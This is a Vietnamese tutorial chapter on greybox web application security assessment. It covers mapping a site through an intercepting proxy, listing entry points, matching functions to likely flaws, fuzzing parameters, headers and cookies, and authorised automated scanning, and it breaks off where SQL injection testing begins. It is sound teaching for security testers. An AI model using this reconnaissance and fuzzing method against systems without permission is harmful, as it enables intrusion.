ATTT Ứng dụng Web - PHẦN 4: ĐÁNH GIÁ AN TOÀN THÔNG TIN ỨNG DỤNG WEB

ATTT Ứng dụng Web - PHẦN 4: ĐÁNH GIÁ AN TOÀN THÔNG TIN ỨNG DỤNG WEB

Oct 4, 2020·

69 min read

PHẦN 4: ĐÁNH GIÁ AN TOÀN THÔNG TIN ỨNG DỤNG WEB

I. Quy trình đánh giá an toàn thông tin ứng dụng web Greybox

1. Các phương pháp đánh giá an toàn thông tin ứng dụng web

1.1 Tại sao cần đánh giá an toàn thông tin ứng dụng web

 • Hiện nay, Website và các ứng dụng dựa trên nền web ngày càng đa dạng và phổ biến. Các công ty ngày càng dựa vào web để phục vụ cho các hoạt động kinh doanh của mình, bởi vì:
 • Website là bộ mặt của công ty ( giới thiệu thông tin về công ty) nhận trả lời các phẩn hồi từ người dùng.

 • Website là nơi cung cấp dịch vụ của công ty ( mua bán hàng hóa, thanh toán trực tuyến…).

 • Tuy nhiên, nhiều ứng dụng web vẫn còn tồn tại những lỗ hổng nghiêm trọng chưa được sửa chữa. Do đó, cần phải thực hiện đánh giá điểm yếu an ninh hệ thống website, nhắm tới mục tiêu:
 • Phát hiện ra những lổ hổng bảo mật nằm trong các ứng dụng Web/Website của hệ thống website có nguy cơ bị tấn công và phá hoại.

 • Từ những kết quả thu thập được của việc dò quét sử dụng các kỹ thuật để tấn công thử nghiệm vào hệ thống website.

 • Đưa ra các báo cáo lỗ hổng, điểm yếu an ninh và những khuyến nghị về công nghệ để khắc phục những điểm yếu phát hiện được trong hệ thống.

1.2 Phương pháp đánh giá ứng dụng web

 • Có 3 phương pháp tiến hành đánh giá ứng dụng, gồm: Black box, White box và Gray box. Cụ thể là:
 • Black box: Chuyên viên đánh giá kiểm tra mức độ bảo mật mà không có bất kỳ thông tin nào về cấu trúc của ứng dụng, các thành phần bên trong của nó. Chuyên viên đánh giá đóng vài trò như một kẻ tấn công. Nhân viên quản trị có thể giám sát hệ thống trong quá trình kiểm tra nhưng không được thay đổi thông tin cấu hình nếu không thoả thuận trước với người kiểm tra. Sẽ có một bản báo cáo cho quá trình kiểm tra sau khi hoàn tất các khuyến cáo.

 • White box: Có đầy đủ kiến thức, thông tin bên trong ứng dụng. Whitebox bao gồm quá trình rà soát mã nguồn ứng dung để tìm lỗi.

 • Graybox: Chuyên viên đánh giá kiểm tra với một lượng thông tin được cung cấp. Ví dụ như: platform vendor, sessionID generation algorithm.

 • Với phương pháp Whitebox, người kiểm tra ứng dụng đóng vai trò là người phát triển ứng dụng đó. Phương pháp này có hai hướng tiếp cận chính là:
 • Hướng tiếp cận thủ công: Mở code và đọc toàn bộ không sử dụng công cụ trợ giúp nào.

 • Hướng tiếp cận sử dụng công cụ: Là những công cụ mà trợ giúp người kiểm tra trong quá trình quan sát mã nguồn ứng dụng một cách trực quan (những hàm có khả năng gây lỗi, quá trình các biến sử dụng, …)

 • Phương pháp này đảm bảo tính bao phủ toàn diện. Tuy nhiên độ phức tạp cao, với khối lượng lớn các mã lệnh và mối liên hệ phức tạp trong ứng dụng thì rõ ràng việc tiếp cận bằng quan sát mã nguồn không phải đơn giản. Hơn nữa, không phải ứng dụng nào cũng dễ dàng có được mã nguồn phát triển cho người kiểm tra có thể quan sát.

 • Phương pháp tiếp theo là Blackbox. Người kiểm tra đóng vai trò là người dùng cuối (tức là người sử dụng ứng dụng). Phương pháp này đảm bảo:

 • Tính sẵn sàng cao: tức là không nhất thiết phải chờ có mã nguồn thì mới có thể kiểm tra được ứng dụng, có thể kiểm tra bất cứ ứng dụng nào.

 • Tính sử dụng lại cao: tức là khả năng sử dụng lại việc kiểm tra đối với ứng dụng. Ví dụ một công cụ dùng để kiểm tra đối với ứng dụng FTP A thì có thể dùng công cụ đó đối với việc kiểm tra ứng FTP B hay FTP C vẫn bình thường, không phân biệt rõ ràng ứng dụng đó như thế nào ?

 • Đơn giản dễ thực hiện không đòi hỏi phải có nhiều quy trình phức tạp, ...

 • Tính bao phủ hạn chế là một trong những hạn chế lớn nhất của blackbox testing. Tức là phải xây dựng nhiều tình huống kiểm tra cho ứng dụng và phải quét hết tất cả các trường hợp đầu vào mà ứng dụng sử dụng, như vậy mới triệt để trong việc kiểm tra.

 • Phương pháp Graybox thì kiểm tra một ứng dụng ở dạng “lưng chừng”. Tức là một ứng dụng có thể chúng ta không có mã nguồn mà nó phát triển nhưng có thể dịch ngược và đọc mã nguồn của ứng dụng đó để tìm ra lỗi bảo mật. Trong trường hợp cụ thể, có thể có tài khoản hệ thống, cơ sở dữ liệu để xem nội dung file, cấu trúc thư mục, cấu trúc cơ sở dữ liệu giúp tiết kiệm thời gian tìm kiếm thông tin. Phương pháp này đảm bảo tính sẵn sàng cao: nếu như thực hiện BinAudit thì luôn luôn sẵn sàng nếu chúng ta có ứng dụng. Đối với ứng dụng web, chỉ cần có tài khoản hệ thống là thực hiện được. Phương pháp này làm tiền đề cho blackbox testing: việc thực hiện greybox testing giúp người kiểm tra xác định rõ hơn vị trí, kiểu dữ liệu đề trình trong quá trình thực hiện blackbox testing. Tuy nhiên để có thể đọc hiểu và tìm ra lỗi thì đòi hỏi người kiểm tra lỗi phải có background tốt về kiến thức lập trình, hệ thống, phân tích, phán đoán, ...

 • Tài liệu sẽ trình bày theo hai hướng tiếp cận chính là graybox và whitebox (rà soát mã nguồn ứng dụng).

2. Các khái niệm

2.1 Điểm vào ứng dụng

 • Điểm vào ứng dụng: là các điểm nhập liệu khác nhau mà người sử dụng gửi đến ứng dụng để xử lý bao gồm URLs, tham số trên querystring, trong phần POST, cookies, và những phần khác trong header mà được xử lý bởi ứng dụng. Điểm vào ứng dụng có thể là:
 • Các tham số trên URL

 • Các tham số, thành phần trong POST data.

 • Giá trị các trường trong HTTP Header: Cookie, Reference…

Hình 55: Điểm vào ứng dụng trong HTTP Request

2.2 Intercept proxy

 • Intercept proxy là một loại Proxy, đứng giữa người dùng để sử dụng để theo dõi, sửa đổi, phát lại các request HTTP mà người dùng gửi lên ứng dụng.

 • Intercept proxy được sử dụng để thay đổi dữ liệu gửi từ người dùng gửi lên ứng dụng, ví dụ như người dùng muốn kiểm tra mắc lỗi SQL tại giá trị username thì có thể sử dụng proxy để thử gửi lên các tập mã tấn công xem có xác định hay không.

 • Việc gửi thay đổi HTTP request tại Intercept proxy sẽ tránh được những mã hóa của trình duyệt. Ngoài ra, một số loại Intercept proxy như Burp suite còn hỗ trợ tính năng phát lại, cho phép thử lại nhiều lần….

Hình 56: Công cụ BurpSuite

3. Quy trình đánh giá an toàn thông tin ứng dụng web

 • Quá trình đánh giá an toàn thông tin ứng dụng web gồm các bước:
 • Xây dựng cấu trúc site, thư mục.

 • Liệt kê tất cả điểm vào ứng dụng.

 • Xác định khả năng tấn công.

 • Kiểm tra lỗi

 • Kiểm tra lại bằng công cụ.

3.1 Xây dựng cấu trúc site, thư mục.

 • Bước này cần duyệt tất cả chức năng của ứng dụng thông qua intercept proxy. Có thể sử dụng công cụ spider để phát hiện những đường dẫn, chức năng còn bỏ sót. Kết thúc bước này cần xây dựng cấu trúc cây thư mục của ứng dụng. Cây bao gồm các file, thư mục, các request/response phục vụ cho việc tìm điểm vào ứng dụng.

 • Quá trình thực hiện gồm các bước:

Bước 1: Phân loại ứng dụng thành hai phần: Phần yêu cầu đăng nhập và phần không yêu cầu đăng nhập.

Bước 2: Tiến hành Spider. Với những thành phần, chức năng không yêu cầu đăng nhập thì quá trình gồm hai bước: passive spider và active spider.

 • Passive Spider:

1. Cấu hình intercepting proxy để quan sát và phân tích nội dung được xử lý bởi proxy. (Tham khảo phụ lục – Hướng dẫn sử dụng Burp Suite).

2. Duyệt toàn bộ ứng dụng theo cách thông thường (truy cập các liên kết, thực hiện đệ trình form, thao tác nhiều bước, ...). Chú ý quan sát các yêu cầu và phản hồi được chuyển đến intercepting proxy để hiểu kiểu dữ liệu được đệ trình và cách client kiểm soát hành vi của ứng dụng phía máy chủ.

 • Ứng dụng web sẽ có một số thư mục ẩn, không thấy được nếu chỉ duyệt các liên kết thông thường trên giao diện ứng dụng. Sử dụng thông tin tài khoản hệ thống (tài khoản hệ điều hành) được cung cấp, truy cập vào thư mục đặt ứng dụng web để xác định những thành phần, thư mục ẩn này. Tiến hành truy cập những thư mục ẩn này thông qua intercepting proxy. Lặp bước này cho đến khi duyệt được hết nội dung, chức năng của ứng dụng Web.
 • Active Spider:
 • Khi đã hoàn tất việc tìm hiểu ứng dụng bằng trình duyệt và passive spider, tiếp đến thực hiện active spider, để khám phá thêm các nội dung mới.

 • Chú ý, cần phải thiết lập phạm vi cho quá trình thực hiện active spider (loại bỏ những file hoặc thư mục không muốn thực hiện spider) để tránh những tác động không mong muốn gây ảnh hưởng đến ứng dụng web. (Tham khảo phụ lục – Hướng dẫn sử dụng Burp Suite).

 • Ví dụ: Ứng dụng web cung cấp chức năng cho khách gửi comment. Sử dụng active spider có thể tự động tạo ra nhiều comment, dữ liệu rác cho ứng dụng web.

 • Với những thành phần yêu cầu đăng nhập chỉ thực hiện Passive Spider. Tiến hành đăng nhập với nhiều mức tài khoản khác nhau, xác định tất cả nội dung, chức năng tương ứng với tài khoản đó.

 • Lưu ý: Tất cả thao tác duyệt phải thực hiện qua Intercrept Proxy để lưu lại thông tin về sitemap, request.

 • Kết thúc bước này thu được site map của ứng dụng, bao gồm cấu trúc file, thư mục, các url. Nên lưu lại trạng thái của site map.

3.2 Xác định tất cả điểm vào ứng dụng

 • Bước này tiến hành phân tích site map, các request thu được ở bước trên, xác định tất cả các điểm vào ứng dụng. Quá trình thực hiện gồm:

 • Quan sát lại site map thu được ở trên, tiến hành nhận diện các chức năng cụ thể, chi tiết của ứng dụng, gồm:

 • Nhận diện các chức năng cốt lõi mà ứng dụng tạo ra và hành động của mỗi chức năng được thiết kế.

 • Nhận diện được các cơ chế bảo mật cốt lõi được triển khai và cách làm việc của chúng. Hiểu được cơ chế xử lý chứng thực, quản lý phiên, điều khiển truy cập và các chức năng hỗ trợ như đăng kí, khôi phục lại mật khẩu. Ví dụ:

 • Đăng nhập sử dụng phương pháp gì ? token hay username/password, có sử dụng captcha không?

 • Quản lý phiên như thế nào? Mỗi lần đăng nhập có cấp phát phiên mới hay không ? Giá trị session id được sinh ra có ngẫu nhiên hay không ?

 • Có cung cấp chức năng đăng ký, quên mật khẩu hay không ? Cơ chế đăng ký, khôi phục mật khẩu thế nào?

 • Cập nhật những thông tin về chức năng, cùng địa chỉ url, giá trị, cơ chế bảo mật vào bảng “Danh mục điểm vào ứng dụng” theo biểu mẫu BM.QTĐG.ATTT.03

 • Đối với mỗi yêu cầu, nhận diện tất cả các điểm nhập liệu khác nhau mà người dùng gửi đến ứng dụng để xử lý bao gồm:

 • Tất cả URL string chứa chuỗi truy vấn

 • Tất cả tham số gửi qua URL

 • Tất cả tham số trong phần body của POST request

 • Tất cả cookie

 • Tất cả HTTP header mà ứng dụng có thể xử lý, gồm: User-Agent, Referer, Accept, Accept-Language, Host headers.

 • Để đảm bảo thu thập hết các điểm vào ứng dụng, cần đảm bảo:
 • Phân tích đủ hết các HTTP request đã gửi lên ở bước trên.

 • Phân tích để lấy đủ hết các điểm vào ứng dụng trong từng HTTP request.

 • Đối với những trường hợp thông thường, điểm vào ứng dụng có thể dễ dàng nhận ra. Nên xác định các điểm vào ứng dụng dựa trên HTTP request:

Hình 57: Xác định điểm vào ứng dụng

 • Trong hình trên, các điểm vào ứng dụng có thể trong:
 • URL string: Sử dụng việc phân tích url, lấy ra các name ( tham khảo phần định nghĩa URI) làm đầu vào ứng dụng

 • Các trường trong HTTP header như: User Agent, Cookie, Referer.

 • Giá trị POST data: Cũng sử dụng phương pháp phân tích URI. Ví dụ như hình trên lấy được hai điểm vào ứng dụng là: username và password.

URL string:

 • Các thành phần của URL đứng trước chuỗi truy vấn (query string) thường bị bỏ qua, vì đơn giản chúng chỉ là tên thư mục, file trên hệ thống file system của máy chủ ứng dụng. Tuy nhiên, nếu ứng dụng sử dụng REST-style URL thì thành phần trong URL có thể là đầu vào cho ứng dụng. Một URL kiểu REST có dạng như sau:
 • Trong ví dụ trên, chuỗi “electronics” và “iPhone3G” có thể là tham số cho một hàm tìm kiếm. Tương tự với URL sau:
 • Mỗi thành phần trong URL phía sau “updates” là đều có thể được xử lý như là một tham số đầu vào của ứng dụng.

 • Hầu hết các ứng dụng sử dụng REST-style URLs đều dễ dàng xác định được cấu trúc URL dựa vào ngữ cảnh ứng dụng, ngữ nghĩa của URL. Tuy nhiên, không có quy tắc cụ thể, vì nó phụ thuộc vào tác giả của ứng dụng.

Chú ý:

 • Các ứng dụng thường sử dụng mod_rewrite để tạo ra REST-style URLs.

Tham số trong request:

 • Các tham số được gửi lên trong URL, message body, HTTP cookies là những điểm vào ứng dụng dễ dàng nhận ra nhất. Tuy nhiên, có một số ứng dụng không sử dụng phương pháp tiêu chuẩn (định dạng name=value) cho tham số. Có thể sử dụng những cấu trúc riêng, những dấu tách khác như:
 • /dir/file;foo=bar&foo2=bar2

 • /dir/file?foo=bar$foo2=bar2

 • /dir/file/foo%3dbar%26foo2%3dbar2

 • /dir/foo.bar/file

 • /dir/foo=bar/file

 • /dir/file?param=foo:bar

 • /dir/file?data=%3cfoo%3ebar%3c%2ffoo%3e%3cfoo2%3ebar2%3c%2ffoo2%3e

 • Để xử lý định dạng URL này, cần phải phân tách hoặc giải mã các thành phần trong URL. Ví dụ ở URL cuối cùng, nếu bỏ qua định dạng tùy chỉnh thì sẽ chỉ thấy được chuỗi truy vấn có chứa một tham số duy nhất được coi là dữ liệu. Điều đõ sẽ bỏ qua nhiều loại lỗ hổng có thể tồn tại khi xử lý. Ngược lại, nếu chia tách định dạng, đặt trong bối cảnh là một chuỗi các trường dạng XML thì ngay lập tức phát hiện ra nhiều lỗ hổng SQL injection và path traversal.

/dir/file?data=%3cfoo%3ebar%3c%2ffoo%3e%3cfoo2%3ebar2%3c%2ffoo2%3e

 • Nếu nhìn bình thường sẽ là một điểm vào data với gián trị là %3cfoo%3ebar%3c%2ffoo%3e%3cfoo2%3ebar2%3c%2ffoo2%3e.

 • Phân tích chuỗi “%3cfoo%3ebar%3c%2ffoo%3e%3cfoo2%3ebar2%3c%2ffoo2%3e” bằng cách sử dụng URL decode sẽ được chuỗi: “barbar2”. Như vậy sẽ thấy có hai điểm vào ứng dụng là foo=bar và foo2=bar2.

 • Thông thường sẽ có các kiểu biến đổi như sử dụng: URL encode, base64 encode, hoặc sử dụng dạng dấu phân tách khác dấu & thông thường như ;, $...Trong một số trường hợp, người lập trình sẽ sử dụng phương pháp mã hóa để “gói” tất cả các biến vào một biến chung (mã hóa toàn bộ URI) thành một biến.

HTTP Headers:

 • Một số ứng dụng sử dụng chức năng log tùy chỉnh. Nội dung của giá trị log có thể xuất phát từ các trường trong HTTP Header như Referer và User-Agent. Những giá trị này luôn được coi là những điểm vào ứng dụng. Để xác định được xem ứng dụng có sử dụng HTTP Header không cần phải phân tích ứng dụng, cách mà ứng dụng xử lý, đầu vào cho chức năng đó. Ví dụ như:

 • Ứng dụng có thể phát hiện ra rằng người dùng đã đến thông qua một công cụ tìm kiếm và tùy chỉnh với chuỗi tìm kiếm đó. Khi đó, rất có thể trường Referer đã được ứng dụng sử dụng.

 • Xu hướng trong thời gian gần đây là cho phép hiển thị những trang khác nhau trên những thiết bị khác nhau, trình duyệt web khac nhau. Như vậy ứng dụng phát hiện ra người dùng sử dụng trình duyệt loại gì ? IE hay Firefox, Chrome. Nếu người dùng sử dụng di động để truy cập thì tự động chuyển sang trang dành cho di động. Điều này có thể làm được bằng cách sử dụng trường User-Agent trong HTTP Header. Đây chính là một đầu vào cho ứng dụng. Từ đây có thể dẫn đến những giao diện khác nhau, những tính năng khác nhau của ứng dụng.

 • Để phát hiện xem ứng dụng có sử dụng User-Agent như là một đầu vào hay không, có thể thử truy cập với một User-Agent khác. Firefox có add-on User-Agent Switcher hỗ trợ việc thay đổi User-Agent này.

Hình 58: Công cụ thay đổi User-Agent

 • Link add-on: addons.mozilla.org/en-US/firefox/addon/user..

 • Tiến hành truy cập với User-Agent khác nhau (thường là sử dụng User-Agent của thiết bị di động). Nếu hiển thị giao diện khác nhau thì có thể sử dụng User-Agent. Trường hợp khác là ứng dụng có chức năng thông báo người dùng đang sử dụng trình duyệt gì thì cũng sử dụng User-Agent.

 • Cập nhật những điểm vào ứng dụng tìm được vào bảng “Danh mục điểm vào ứng dụng” theo biểu mẫu BM.QTĐG.ATTT.03. Ví dụ về bảng “Danh mục điểm vào ứng dụng” khi kết thúc:

STT

URL

Phương thức

Mô tả

Đánh giá khả năng lỗi

Ghi chú

1

localhost

Cookie

PHPSESSID=3l9hrft7npk8t5q36qv8gch3i3

2

localhost

User-Agent

Mozilla/5.0

3

http://localhost/login

GET

Trang đăng nhập

4

localhost?id=1

GET

Điểm vào id=1

5

http://localhost/login

POST

Điểm vào Username=abc

3.3 Xác định khả năng tấn công

 • Bước này tiến hành phân tích từng điểm vào ứng dụng, xác định điểm vào đó có thể mắc lỗi gì. Mục đích là xác định khả năng tấn công ứng dụng. Ánh xạ giữa cấu trúc bên trong và chức năng của ứng dụng ở phía server. Ví dụ một chức năng nhận thông tin đặt hàng của khách hàng thì chắc chắn sẽ tương tác với database.

 • Bước này yêu cầu:

 • Hiểu được những chức năng chính được triển khai như thế nào ? sử dụng cơ chế bảo mật như thế nào ?

 • Xác định tất cả chức năng chi tiết của ứng dụng và ánh xạ những chức năng này sang những lỗ hổng bảo mật có thể mắc. Với mỗi điểm vào ứng dụng thu được ở trên, nhận diện các lỗi thông dụng thường xuất hiện ở chúng. Cụ thể như sau:

STT

Chức năng/Tương tác

Khả năng mắc lỗi

Tương tác với cơ sở dữ liệu

SQL injection

Tương tác với hệ thống (ping, traceroute)

Command injection

File upload, download

Path traversal, stored cross-site scripting

Hiển thị thông tin do người dùng cung cấp

Cross-site scripting

Dynamic redirects

Chuyển hướng người dùng, header injection

Đăng nhập, đăng ký, khôi phục mật khẩu.

Liệt kê người dùng, mật khẩu yếu, tấn công brute force

Đăng nhập nhiều lớp (username/password, token)

Logic flaws

Tính năng mạng xã hội, thông tin tài khoản

Liệt kê người dùng, stored cross-site

scripting

Tương tác với email

E-mail và/hoặc command injection

Sử dụng ứng dụng hãng thứ ba

Những lỗ hổng đã công bố

Phiên

Session Fixation

Chức năng quan trọng (thêm, sửa, xóa người dùng)

CSRF

Thông tin truyền dạng rõ

Session Hjacking

Phân quyền theo chiều ngang

Phân quyền truy cập dữ liệu

Phân quyền theo chiều dọc

Leo thang đặc quyền

 • Nếu ứng dụng sử dụng nền tảng bên thứ ba cung cấp, tiến hành tìm kiếm những lỗ hổng bảo mật đã được công bố tại: www.osvdb.org. Lưu ý: Tìm kiếm với phiên bản tương ứng.

Ví dụ thực tế:

 • Sau khi ánh xạ được giữa nội dung và chức năng của ứng dụng EIS, nhiều đường dẫn sẽ được sử dụng để kiểm tra ứng dụng.

Hình 59: Ví dụ về sitemap thu được

 • Thư mục /auth có chức năng đăng nhập. Chức năng này sẽ cần kiểm tra: các lỗi xác thực, quản lý phiên, kiểm soát truy cập.

 • Thư mục /core, trang sitestats nhận tham số đầu vào là một mảng phân tách với nhau bằng dấu | (rank|hits|time). Có thể tấn công butefocre để buộc ứng dụng hiển thị nhiều thông tin hơn (source|location|ip), từ đó tiết lộ thêm nhiều thông tin về người dùng. Quan tâm tới tham số pageID đang hướng tới một trang home. Thử một từ khóa đại diện như pageID=all hoặc pageID=*. Cuối cùng, pageID có dấu gạch chéo (/) nên có khả năng tấn công path traversal.

 • Thư mục /gb cung cấp tính năng guestbook. Khi truy cập vào đây cho phép người dùng để lại tin nhắn của mình, lưu lại, trả về những gì người dùng đã nhập vào. Có thể mắc lỗi Cross-site-scripting.

 • Thư mục /home dành cho người dùng đã được xác thực. Có thể thực hiện kiểm tra phân quyền theo chiều ngang ( thử truy cập tài nguyên người khác) để đảm bảo có sử dụng kiểm soát truy cập ở mọi trang hay không.

 • Thư mục /icon và /images chứa những nội dung tĩnh như ảnh. Nên kết hợp thông tin tài khoản hệ điều hành để kiểm tra nhanh lại xem có tồn tại nội dung, file thực thi khác hay không.

 • Thư mục /pub có hai thư mục con là /pub/media và /pub/user. Trong phần user, có thể tấn công bruteforce vào giá trị số /pub/user/11. Đây có thể userid.

 • Thư mục /shop cung cấp chức năng mua bán hàng trực tuyến và số lượng lớn các URL. Có thể thực hiện những bài kiểm tra logic để mua hàng giảm giá hoặc không phải thanh toán.

 • Kết quả: Cập nhật những lỗ hổng đã dự đoán với điểm vào ứng dụng tương ứng trong bảng “Danh mục điểm vào ứng dụng” theo biểu mẫu BM.QTĐG.ATTT.03. Ví dụ:

STT

URL

Phương thức

Mô tả

Đánh giá khả năng lỗi

Ghi chú

localhost

Cookie

PHPSESSID=3l9hrft7npk8t5q36qv8gch3i3

Session Fixation

localhost

User-Agent

Mozilla/5.0

http://localhost/login

GET

Trang đăng nhập

Liệt kê người dùng, tấn công mật khẩu

localhost?id=1

GET

Điểm vào id=1

SQL injection

http://localhost/login

POST

Điểm vào Username=abc

Session Hijacking

3.4 Kiểm tra khả năng lỗi.

 • Dựa vào thông tin về điểm vào, lỗi có thể mắc, tiến hành kiểm tra khả năng mắc lỗi với từng điểm vào ứng dụng. Kiểm tra các lỗi:
 • Lỗi liên quan đến xác thực: liệt kê người dùng, tấn công vét cạn mật khẩu, chính sách mật khẩu mạnh.

 • Lỗi liên quan đến quản lý phiên: Session Fixation, Session Hijacking, lỗi CSRF.

 • Lỗi liên quan đến phân quyền, logic ứng dụng: lỗi phân quyền truy cập người dung, lỗi leo thang đặc quyền.

 • Lỗi không mã hóa dữ liệu nhạy cảm, sử dụng thuật toán mã hóa yếu.

 • Lỗi cho phép spam SMS, email.

 • Lỗi phê chuẩn đầu vào dữ liệu, bao gồm:

 • Lỗi nhúng mã: SQL injection, OS command injection

 • Lỗi Cross-site-scripting

 • Lỗi thao tác với file: Path Traversal, Local File include/Remote File include.

 • Lỗi liên quan đến chuyển hướng người dùng.

 • Phương pháp kiểm tra đối với những lỗi thuộc dạng phê chuẩn đầu dữ liệu là sử dụng kỹ thuật Fuzzing. Phương pháp này có nghĩa là tiến hành gửi tới điểm vào dữ liệu những loại dữ liệu không hợp lệ (dữ liệu sai, dữ liệu gây lỗi, thường được gọi là mã tấn công, payload), nhận lấy kết quả trả về từ ứng dụng, phân tích xem có khả năng mắc lỗi hay không. Việc fuzzing được tiến hành ở tất cả điểm vào ứng dụng, bao gồm:
 • URI: Các thành phần trong URI, Post Data

 • Protocol: Các thành phần gồm: HTTP Protocol, HTTP Header, Cookie

Fuzzing URI: URI có cấu trúc như sau:

/[path]/[page].[extension]?[name]=[value]&[name]=[value]

 • Trong đó:
 • path: Đối với path thì trong quá trình fuzz các lỗi thường được kiểm tra là path traversal.

 • page:Đối với page thì có thể có các lỗi như để lộ những tập tin nhạy cảm như config.bin, config.inc, …

 • extension:Khi fuzzing một số extension mà server không hỗ trợ có thể nhận diện ra được công nghệ mà web server đó sử dụng và nhận thấy lỗi thông báo từ web server khi thực hiện truy vấn các extension không hỗ trợ.

 • name:quá trình fuzzing các thành phần biến có thể dẫn đến khám phá các biến mà không công bố mà có khả năng vượt qua server. Hơn nữa việc gửi các thêm các biến không mong đợi có thể dẫn đến ứng dụng ứng dụng bộc lộ thêm các ứng xử không lường trước.

 • value:các giá trị này là các giá trị mà ứng dụng mong đợi từ người sử dụng, trong quá trình fuzzing thì việc thay đổi các giá trị mong đợi từ ứng dụng có thể kiểm tra ứng dụng có thể bị các lỗi như các lỗi liên quan đến chèn như sql injection, xss, local file inclusion, remote file inclusion, … Đây là thành phần được kiểm tra nhiều nhất.

 • separator:là thành phần mà web server sử dụng để nhận biết các tham số và giá trị mà ứng dụng Web server sử dụng. Trong quá trình fuzzing các separator này thì các webserver khác nhau thì sẽ có kiểu xử lý khác nhau.

Fuzzing Protocol: Giao thức HTTP hay sử dụng HTTP/1.0 và HTTP/1.1. Tiến hành fuzzing các thành phần mà giao thức HTTP, gồm:

 • Fuzzing các phương thức đệ trình khác ngoài GET/POST như PUT, DELETE, TRACE, …

 • Fuzzing các phương thức đề trình khác mà giao thức HTTP không hỗ trợ để xem sự phản ứng của Web Server.

Fuzzing Header và Cookies: Cấu trúc của Header trong giao thức HTTP có dạng:

[Header name]: [Header value]

 • Quá trình fuzzing các thành phần Header name và Header value để xem sự phản ứng của Web Server. Lưu ý nếu gửi dữ liệu bằng phương thức POST thì dữ liệu được gửi trong phần Header và cách kiểm tra cũng tương tự như Fuzzing URI.

 • Cookies là thành phần quan trọng trong ứng dụng Web và thường được ứng dụng Web làm nơi lưu trữ thông tin phiên làm việc. Fuzzing các thành phần của Cookies luôn cần được chú ý đến. Các thức fuzzing cũng tương tự như Fuzzing URI.

 • Sau khi tiến hành gửi, fuzzing điểm vào ứng dụng, cần phân tích kết quả fuzzing để biết điểm vào đó có mắc lỗi hay không. Để nhận biết có mắc lỗi hay không, có thể phân tích, nhận biết theo:
 • HTTP Status code: Trong quá trình fuzzing thì cách Web Server xử lý thường bộc lộ qua mã trạng thái của nó. Ví dụ: 401 – Unauthorized, 500 – Internal Server Errors …

 • Web server error messages: Các thông điệp được thông báo bởi ứng dụng hoặc Web Server.

 • Dropped connections: Quá trình fuzzing có thể dẫn đến Web server bị down bởi một dữ liệu fuzzing nào đó.

 • Log files và Event Logs: Là các nhật ký hệ thống lưu trữ quá trình trao đổi giữa Web Server và User.

 • Quá trình tiến hành fuzzing với mỗi loại lỗi, bao gồm vị trí tiến hành fuzzing, mã tấn công, phương pháp nhận diện lỗi khác nhau. Tùy mỗi đặc trưng của từng lỗi sẽ có đặc điểm, cách làm khác nhau. Trong phần trên, mỗi điểm vào ứng dụng đều được tiến hành dự đoán lỗi có thể mắc phải.

3.5 Kiểm tra bằng công cụ tự động.

 • Sử dụng công cụ tự động dò quét lại ứng dụng, tránh trường hợp bỏ sót lỗi, không tìm hết điểm vào ứng dụng.

 • Lưu ý khi sử dụng: Việc sử dụng công cụ tiềm ẩn nguy cơ gây ra ảnh hưởng tới ứng dụng, cơ sở dữ liệu. Chú ý các vấn đề:

 • Chỉ sử dụng công cụ dò quét tự động khi có sự đồng ý cho phép của trưởng nhóm đánh giá.

 • Đánh giá khả năng trước khi thực hiện quét tự động.

 • Thông báo, thỏa thuận trước với đơn vị vận hành về thời gian tiến hành dò quét.

 • Chỉ sử dụng công cụ dò quét tự động tại những thành phần không yêu cầu đăng nhập, cập nhật dữ liệu lên cơ sở dữ liệu ( ví dụ như phần comment, sửa xóa thông tin cá nhân, upload file không được phép sử dụng công cụ tự động).

 • Việc dò quét tự động chỉ được thực hiện vào thời gian ứng dụng hoạt động thấp tải nhất (đối với ứng dụng đang hoạt động).

 • Trong quá trình dò quét, thành viên đánh giá phải trực tiếp làm việc, kiểm soát công cụ.

 • Sử dụng công cụ tự động như Acunetix, AppScan để tiến hành dò quét. (Tham khảo phụ lục hướng dẫn sử dụng phần mềm Acunetix).

 • Phân tích kết quả trả về của công cụ. Kết quả trả về có thể đúng hoặc sai, trong đó có thể bao gồm những lỗi đã tìm được ở bước trên hoặc không.

Hình 60: Công cụ Acunetix

 • Đối với những lỗi ứng dụng đã tìm được ở trên, tiến hành kiểm tra lại xem còn bỏ sót điểm vào ứng dụng nào nữa hay không.

 • Trường hợp phát hiện có thông báo lỗi tại điểm vào ứng dụng mới, cần phải cập nhật điểm vào ứng dụng vào bảng “”. Sau đó tiến hành kiểm tra lại khả năng mắc lỗi bằng tay như hướng dẫn ở trên. Nếu có mắc lỗi tiến hành cập nhật thêm vào bảng.

 • Đối với những lỗi ứng dụng mới mà kiểm tra bằng tay không phát hiện ra được, tiến hành kiểm tra lại có tìm ra điểm vào ứng dụng mắc lỗi hay không. Nếu chưa có điểm vào ứng dụng đó cập nhật vào. Sau đó tiến hành kiểm tra lại khả năng mắc lỗi bằng tay như hướng dẫn ở trên. Nếu có mắc lỗi tiến hành cập nhật thêm vào bảng.

 • Cập nhật đầy đủ thông tin về các điểm vào ứng dụng, các lỗi mắc phải vào các bảng cần thiết.

4. Hướng dẫn thực hiện đánh giá Greybox

4.1 Kiểm tra lỗi nhúng mã

 • Mô tả: Lỗi nhúng mã xảy ra khi người dùng chèn những đoạn mã tấn công vào yêu cầu gửi đến cho ứng dụng xử lý, làm ứng dụng hoạt động sai lệch, không đúng mục đích thiết kế ban đầu. Lỗi này rất phổ biến, xuất hiện trong truy vấn SQL, các câu lệnh OS, các tham số của ứng dụng.

 • Ví dụ: Khi truy vấn tới cơ sở dữ liệu lập trình viên thường sử dụng phương pháp cộng xâu Input từ người dùng. Nếu như ứng dụng sử dụng những xâu này để truy vấn cơ sở dữ liệu SQL thì có thể mắc lỗi SQL Injection. Lợi dụng lỗi này, kẻ tấn công có thể xem, thêm, sửa, xóa dữ liệu trong database từ đó chiếm được tài khoản quản trị, lấy được toàn bộ dữ liệu của ứng dụng.

 • Nguy hiểm hơn, nếu xâu Input từ người dùng không được kiểm tra mà có thể tương tác với hệ thống qua các lệnh điều khiển OS thì ứng dụng có thể mắc lỗi OS Injection. Trường hợp hệ thống không được cấu hình tốt thì kẻ tấn công hoàn toàn có thể chiếm quyền điều khiển máy chủ.

Kiểm tra lỗi SQL injection như sau:

 • Dựa vào kết quả quá bước ”Xác định khả năng tấn công ở trên”, tiến hành kiểm tra khả năng mắc lỗi SQL injection của những điểm vào có khả năng. Quá trình kiểm tra như sau:

